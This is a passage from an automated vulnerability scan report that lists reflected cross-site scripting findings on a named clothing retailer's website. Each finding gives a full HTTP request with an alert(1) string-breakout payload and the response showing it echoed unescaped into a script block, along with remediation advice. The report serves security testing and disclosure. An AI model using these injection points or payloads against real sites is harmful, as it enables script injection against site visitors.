X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c9jgs8fku50oedu974bmbvk176; expires=Tue, 09-Nov-2010 17:01:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/women/?e0969"-alert(1)-"29b7f4c9995=1");
//]]>
...[SNIP]...

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53e6b"-alert(1)-"4e4750c7287 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage53e6b"-alert(1)-"4e4750c7287/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=afjfsg3q3tnjk7fmq9un82i3k1; expires=Tue, 09-Nov-2010 17:15:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage53e6b"-alert(1)-"4e4750c7287/");
//]]>
...[SNIP]...

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c544"-alert(1)-"71287e91efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /heritage/?3c544"-alert(1)-"71287e91efc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hsq46ceu74v30ore5bqq9q21q2; expires=Tue, 09-Nov-2010 17:15:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Heritag
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/heritage/?3c544"-alert(1)-"71287e91efc=1");
//]]>
...[SNIP]...

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8616c"-alert(1)-"7472e7ac244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home8616c"-alert(1)-"7472e7ac244/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=14d13cht96sn9sc03rpij71181; expires=Tue, 09-Nov-2010 17:24:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home8616c"-alert(1)-"7472e7ac244/");
//]]>
...[SNIP]...

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6784a"-alert(1)-"467c737cd18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/?6784a"-alert(1)-"467c737cd18=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l2h90hssa4fmthjqbs1gomlmj5; expires=Tue, 09-Nov-2010 17:23:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/home/?6784a"-alert(1)-"467c737cd18=1");
//]]>
...[SNIP]...

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c636"-alert(1)-"401eb60e513 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js1c636"-alert(1)-"401eb60e513/index.php HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8m0oqsmc1sc72tf5e0msm0em36; expires=Tue, 09-Nov-2010 17:15:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/js1c636"-alert(1)-"401eb60e513/index.php");
//]]>
...[SNIP]...

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"-alert(1)-"3736105445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kidsefe09"-alert(1)-"3736105445/kidswear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kp6jr7pki4in7iu19bvd9202h2; expires=Tue, 09-Nov-2010 17:24:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kidsefe09"-alert(1)-"3736105445/kidswear/");
//]]>
...[SNIP]...

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4731"-alert(1)-"b278de41763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidsweard4731"-alert(1)-"b278de41763/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gds6c6cpusu9o67aien66qr4r4; expires=Tue, 09-Nov-2010 17:24:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidsweard4731"-alert(1)-"b278de41763/");
//]]>
...[SNIP]...

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561cd"-alert(1)-"d72a8d8d292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=38gi6i5her1s7f5m53m7icsk66; expires=Tue, 09-Nov-2010 17:23:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Kidswea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1");
//]]>
...[SNIP]...

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288b4"-alert(1)-"8dbdc0fd791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ndi6tjig427j9ttkm97l8sv4g2; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/");
//]]>
...[SNIP]...

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cfd0"-alert(1)-"3724550e2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ebbbjs2q6b6v1n8qrime7tb331; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/");
//]]>
...[SNIP]...

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c166e"-alert(1)-"1986b134245 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1km5s4mm48jq61sf43il38u3s0; expires=Tue, 09-Nov-2010 17:18:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> My Firs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1");
//]]>
...[SNIP]...

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b402"-alert(1)-"7cd71f3fd4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1b402"-alert(1)-"7cd71f3fd4a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mcf7qrdktlf5aa5olcbmpu7l76; expires=Tue, 09-Nov-2010 17:05:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b402"-alert(1)-"7cd71f3fd4a/");
//]]>
...[SNIP]...

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7777c"-alert(1)-"313f3d97d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/?7777c"-alert(1)-"313f3d97d63=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s8uribp858p0bhp2ltgluj547; expires=Tue, 09-Nov-2010 17:04:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Limited
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/?7777c"-alert(1)-"313f3d97d63=1");
//]]>
...[SNIP]...

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1808"-alert(1)-"761be49e7f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

